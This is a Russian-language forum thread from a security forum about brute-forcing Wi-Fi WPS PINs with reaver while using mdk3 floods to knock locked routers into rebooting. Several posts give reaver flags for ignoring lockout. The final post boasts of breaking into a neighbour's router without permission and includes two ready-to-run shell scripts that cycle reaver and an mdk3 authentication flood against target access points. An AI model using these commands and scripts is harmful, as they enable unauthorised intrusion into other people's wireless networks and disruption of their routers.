HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Беспроводные технологии/Wi-Fi/Wardriving

Ответ

Опции темы Поиск в этой теме Опции просмотра

Старый 31.08.2014, 00:57
asdm
Member
Провел на форуме:
43980

Цитата:
Сообщение от J()KER  

Не ну блин, вы хелп читаете или наугад по кнопкам долбите?

в твоем случае тебе нужно добавить параметр -r 9:120 - ривер каждые 9 пинов будет делать паузу в 2 минуты, по идее точка быстрее забывает про предыдущие неудачные попытки чем разлачивается. Время, которое ривер будет ждать подбирай опытным путем, можешь сократить, а может прийдется и увеличить.

я знаю.что точка разлачивается как минимум через 215 секунд,а reaver 1.3 (именно эта версия,с 1.4 и bully все нормально,но там другие проблемы...) продолжает ждать даже по прошествию этих 215 секунд,я уже задавал с помощью ключа -l продолжительность паузы,но следующие 10 пинов он не хочет перебирать,так как считает,что точка все еще залочена,а на самом деле уже все нормально,ведь если остановить подбор и начать заново начинается подбор следующих 10 пинов

Старый 31.08.2014, 01:41
SlNik
Active Member
Провел на форуме:
65951

Цитата:
Сообщение от asdm  

я знаю.что точка разлачивается как минимум через 215 секунд,а reaver 1.3 (именно эта версия,с 1.4 и bully все нормально,но там другие проблемы...) продолжает ждать даже по прошествию этих 215 секунд,я уже задавал с помощью ключа -l продолжительность паузы,но следующие 10 пинов он не хочет перебирать,так как считает,что точка все еще залочена,а на самом деле уже все нормально,ведь если остановить подбор и начать заново начинается подбор следующих 10 пинов

Ну добавь к этому ещё -L . Будет игнорировать лок и долбить дальше.

Старый 31.08.2014, 15:48
СЕРЖ32
Познавший АНТИЧАТ
Провел на форуме:
352373

Цитата:
Сообщение от SlNik  

игнорирует буквально пару пинов,т.е пару пинов перебирает и всё Так что эта команда до одного места так что если точка залочилась,то всё

Старый 31.08.2014, 15:59
СЕРЖ32
Познавший АНТИЧАТ
Провел на форуме:
352373

кстати,попробовал я mdk3 запустить на точку и в то же время ривер работал,когда лок wps....Что могу сказать,фигня это всё.....да,вроде точка или перезагружалась или хозяин перезагружал,или канал сама точка меняет,незнаю,но да,перебор опять пошёл,но пару пинов и опять лок Так если бы точка перезагружалась хоть раз в минуту,было бы супер,а так....долго долбить нужно,миллионы клиентов цеплять нужно,э это время.Вот на ночь так оставил,утром всего 8 пинов Так что фигня этот способ,если лочится,так годами перебирать .

Вот у кого как,когда вы запускаете на точку mdk3?как быстро точка перезагружается,сколько пинов добываете в день?

кстати,при mdk3 адаптер долго не работает,у меня альфа оригинальная,и всё равно через мин 15 адаптер или сам отключается или ещё что то,короче ничего не делает,приходится вытаскивать с usb,опять подключать,и тд....короче все операции производить заново,видимо mdk3 грузит очень адаптер....

Старый 31.08.2014, 18:13
aladin1
Познающий
Провел на форуме:
129683

Цитата:
Сообщение от СЕРЖ32  

кстати,попробовал я mdk3 запустить на точку и в то же время ривер работал,когда лок wps....Что могу сказать,фигня это всё.....да,вроде точка или перезагружалась или хозяин перезагружал,или канал сама точка меняет,незнаю,но да,перебор опять пошёл,но пару пинов и опять лок Так если бы точка перезагружалась хоть раз в минуту,было бы супер,а так....долго долбить нужно,миллионы клиентов цеплять нужно,э это время.Вот на ночь так оставил,утром всего 8 пинов Так что фигня этот способ,если лочится,так годами перебирать .

Вот у кого как,когда вы запускаете на точку mdk3?как быстро точка перезагружается,сколько пинов добываете в день?

кстати,при mdk3 адаптер долго не работает,у меня альфа оригинальная,и всё равно через мин 15 адаптер или сам отключается или ещё что то,короче ничего не делает,приходится вытаскивать с usb,опять подключать,и тд....короче все операции производить заново,видимо mdk3 грузит очень адаптер....

да пойми же ты, что это зависит сугубо от хозяина, когда он будет ребутить роутер и вообще будет ли. я в одном случае ждал 10 минут, во втором 3 часа. сам mdk3 не ребутит точку, он лишь просит хозяина сделать это

а насчет альфы, это распиаренный хомяками шлак, покупал я такую, и кучу гемороя хапнул с ней, зато когда перешел на тп-линк 7200 то забыл о всех проблемах. альфа тупо не умеет работать стабильно, даже при полном сигнале до точки будет отваливаться постоянно, а если еще и стена бетонная между тобой и точкой, то вообще печаль, купи нормальный адаптер и не парься. лично у меня mdk3 спокойно более 3 часов хреначил в три(!) копии одновременно(больше просто не пробовал, но уверен что сможет на много дольше)

Старый 31.08.2014, 18:32
asdm
Member
Провел на форуме:
43980

Цитата:
Сообщение от SlNik  

reaver 1.3 mon0 -b mac -l 215 -L так?

Старый 31.08.2014, 18:51
comporg
Постоянный
Провел на форуме:
160332

Цитата:
Сообщение от asdm  

reaver 1.3 mon0 -b mac -l 215 -L так?

reaver -i mon0 -d 0 -b XX:XX:XX:XX:XX:XX -a -vv -S -n -N -r 9:220 -L -c #

# - номер канала жертвы

Старый 31.08.2014, 19:02
СЕРЖ32
Познавший АНТИЧАТ
Провел на форуме:
352373

Цитата:
Сообщение от aladin1  

да пойми же ты, что это зависит сугубо от хозяина, когда он будет ребутить роутер и вообще будет ли. я в одном случае ждал 10 минут, во втором 3 часа. сам mdk3 не ребутит точку, он лишь просит хозяина сделать это

а насчет альфы, это распиаренный хомяками шлак, покупал я такую, и кучу гемороя хапнул с ней, зато когда перешел на тп-линк 7200 то забыл о всех проблемах. альфа тупо не умеет работать стабильно, даже при полном сигнале до точки будет отваливаться постоянно, а если еще и стена бетонная между тобой и точкой, то вообще печаль, купи нормальный адаптер и не парься. лично у меня mdk3 спокойно более 3 часов хреначил в три(!) копии одновременно(больше просто не пробовал, но уверен что сможет на много дольше)

так у меня 2 альфы,одна из которых на том же чипе что и на тп-линк 7200 ,так что покупать не надо

Странно.тут писали,что mdk3 может вынудить точку самой перезагрузиться,например когда клиентов на неё навешиваешь

а вообще,это всё равно если и будет получаться,то годы уйдут на это,точка ж не каждую минуту перезагружается

А вот на практике,какая команда лучшая в mdk3?мне понравилась та,которая не даёт подключаться с шифрованием wpa/wpa2,но всё равно никто на wep не переходит

Ну и,за какое время так точка задавалась?сколько пинов в день отдавала?

Старый 31.08.2014, 19:05
СЕРЖ32
Познавший АНТИЧАТ
Провел на форуме:
352373

Цитата:
Сообщение от comporg  

reaver -i mon0 -d 0 -b XX:XX:XX:XX:XX:XX -a -vv -S -n -N -r 9:220 -L -c #

# - номер канала жертвы

а канал точка менять может может лучше без канала?я вообще нигде канал не ставлю,что бы автоматом находил,а то точки меняют каналы

Старый 01.09.2014, 00:10
VladimirV
Познавший АНТИЧАТ
Провел на форуме:
348572

Пару дней назад сломал соседа TP-Link который был в локе пол года. Мне в личку написал 4pips за что ему большое СПАСИБО, и дал скрипт с помощью которого он ломал TP-Link_и при помощи mdk3.

Вот его код:

Код:
#!/bin/sh
while true;
# Run reaver to work 50s
do timeout -s SIGINT 50s reaver -i mon0 -b 64:66:B3:AC:XX:XX -N -S -L -s /etc/reaver/6466B3ACXXXX.wpc -v;
sleep 4;
# Run mdk3 to work 10s
echo [+] Mdk3 is working ...
timeout 10s mdk3 mon0 a -a 64:66:B3:AC:XX:XX -m &>/dev/null;
echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C] ;
sleep 24;
done;
У меня он не заработал и я его переделал:

Код:
#!/bin/bash
while true;
# Run reaver to work 10 pin
echo
echo
echo [+] reaver is working ...
do
reaver -i mon0 -b 10:FE:ED:5A:XX:XX -vv -L -g 10 -s /etc/reaver/10FEED5AXXXX.wpc;

# Run mdk3 to work 3s
echo
echo
echo [+] Mdk3 is working ...
gnome-terminal --geometry 10x10-1-1 --title='mdk3' -e "mdk3 mon0 a -a 10:FE:ED:5A:XX:XX";
sleep 3;
killall mdk3 2> /dev/null;
echo [+] Mdk3 finished, waiting ... Good time to interrupt script if you need [Ctrl+C];
sleep 14;
done;
и меньше чем за сутки взломал эту сеть!

sleep 3 - это сколько секунд шарашит mdk3

sleep 14 - пауза до появления точки в эфире

-g 10 - сколько пинов перебирать

Точка от меня через перекрытие и я поставил подбор на 10 пинов но если при подборе были ошибки то reaver зависал и надо было нажать ctrl+c.

Скорость перебора reaver была 2 пина в секунду + пауза + работа mdk3 + поиск точки reaverom по каналам = 48 - 50 секунд на 10 пинов.

https://forum.antichat.ru/threads/310835/page-193#post-4037706

Ответ